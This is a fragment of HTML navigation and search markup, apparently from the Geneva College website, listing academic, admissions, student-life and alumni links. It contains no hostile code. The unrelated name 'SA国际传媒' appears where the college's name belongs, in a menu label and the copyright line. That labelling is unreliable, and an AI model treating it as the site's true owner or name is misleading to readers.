				<input type="hidden" name="as_sfid" value="AAAAAAVQWf3E7kN3wNFl5RikYQrxaUyF-NgSCm8raAZZNzrqGtYrbCy0x_F4ZWkOcQbWar4EmMp1lFtfpfK--RHu0rb-6nT4pbSzpEIPO3vWoKYGG0gX7JZE58dxS7DDHAd2Krw=" /><input type="hidden" name="as_fid" value="7034fe54bce41a79c83721f8377fc27c6aa3395c" /></form>
			</div>
			<!-- end searchBox-menu-->
			<li>
				<span>SA国际传媒</span>
				<ul>
					<li>
						<a href="/about-geneva/">Fast Facts &amp; Overview</a>
					</li>
					<li>
						<a href="/about-geneva/identity/">Geneva Identity</a>
					</li>
					<li>
						<a href="/about-geneva/policies/">Academic Policies</a>
					</li>
					<li>
						<a href="/about-geneva/leadership">Leadership</a>
					</li>
					<li>
						<a href="/articles/">Stories, Blogs &amp; Articles</a>
					</li>
					<li>
						<a href="/calendar/">Calendar of Events</a>
					</li>
				</ul>
			</li>
			<li>
				<span>Academics</span>
				<ul>
					<li><a href="/academics/">Explore Academics</a></li>
                    <li><a href="/academics/programs/">Search Degree Programs</a></li>
                    <li><a href="/academics/core">Core Curriculum</a></li>
                    <li><a href="/academics/honors/">Honors Program</a></li>
                    <li><a href="/graduate/">Graduate Programs</a></li>
                    <li><a href="/online-degree/">Online Degree Programs</a></li>
                    <li><a href="/pittsburgh/">Geneva Pittsburgh Campus</a></li>
                    <li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
                    <li><a href="/cfl/">Center for Faith &amp; Life</a></li>
				</ul>
			</li>
			<li>
				<a aria-haspopup="true">
					<span>Admissions &amp; Aid</span>
				</a>
				<ul>
				    <li><a href="/financial-aid/tug-financial-aid">Undergraduate</a></li>
                    <li><a href="/graduate/admissions/">Graduate</a></li>
                    <li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
                    <li><a href="/admissions/visit/">Visit Geneva</a></li>
                    <li><a href="/admissions/international/">International Students</a></li>
                    <li><a href="/admissions/transfers/">Transfer Students</a></li>
                    <li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
                    <li><a href="/admissions/military/">Military &amp; Veterans</a></li>
				</ul>
			</li>
			<li>
				<span>Student Life</span>
				<ul>
				<li>
						<a href="/student-life/">Student Life Home</a>
					</li>
					<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
                    <li><a href="/calling-career/">Calling &amp; Career</a></li>
                    <li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
                    <li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
                    <li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
                    <li><a href="/student-life/campus-safety/">Campus Safety</a></li>
                    <li><a href="/student-life/academic-support/">Academic Support</a></li>
                    <li><a href="/student-life/commuters">Commuter Life</a></li>
                    <li><a href="/student-life/student-resources">Student Resources</a></li>
				</ul>
			</li>
			<li>
				<span>Alumni</span>
				<ul>
					<li>
						<a href="none">Giving</a>
					</li>
					<li>
						<a href="/alumni/">Alumni Home</a>
					</li>
					<li>
						<a href="/alumni/events/">Alumni Events</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni-update-form">Alumni Update Form</a>
					</li>
					<li>
						<a href="/academics/registrar/student_records_transcripts">Transcript Requests</a>
					</li>
					<li>
						<a href="/alumni/represent/alumni_referrals">Gold and White Referrals</a>
					</li>
					<li>
						<a href="/alumni/represent/legacylink">Legacy Link Program</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni_contact">Contact Alumni Engagement</a>
					</li>
					<!--<li>
						<a href="/homecoming/">Homecoming 2025</a>
					</li>-->
				</ul>
			</li>
			<li>
				<a href="none">
					<span>Athletics</span>
				</li>
			</li>
			<div class="mmenu-undernav">&copy; SA国际传媒 | 
				<a href="/about-geneva/contact_us">Contact Us</a>
			</div>
			<div class="searchBox-panel2"></div>
		</ul></nav>
<!-- Hidden Modal Search --> 
<!--<a href="#modalsearch">Search Geneva.edu</a>-->
<div id="search-box"><a class="close" href="#close"></a>
<div class="container">
<div class="search-main">
<div class="search-inner"><form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng"><input id="inputSearch" name="q" placeholder="Search Geneva.edu" type="text" /> <input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng" /> <input name="cof" type="hidden" value="FORID:11" /> <button class="search-glass" style="cursor: pointer; background: none; overflow: hidden;"> <i aria-hidden="true" class="fa-xl fa-solid fa-magnifying-glass" style="color: #c99a2c;"></i> </button><input type="hidden" name="as_sfid" value="AAAAAAUMVdJcDgFGDJNVEzc5--Cx0nAalhW7O5TQCdZTxbV9QgsT241IyYJrbDVKMIJn77wyosSgALdKfQAZQwn7j9aEgRRP1C2BnK6Y4sAb5MnCPHJH-6-4URJ3O4eQPHdZOcY=" /><input type="hidden" name="as_fid" value="f03e65e711ae40c0e15904af4223bc83d7847e77" /></form><span class="search-info">Hit enter to search or ESC to close</span></div>
</div>
</div>
</div>
<!-- end Hidden Modal Search -->

	


</div>           
          
          <!-- include External Jquery last -->
          
                    
           <!-- Final JS files Include Here-->
          <div>

	

<script src="none" type="text/javascript"></script>
<!-- ADDITIONAL STYLES AND SCRIPTS ========================== -->
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>




</div>          
   </body>
</html>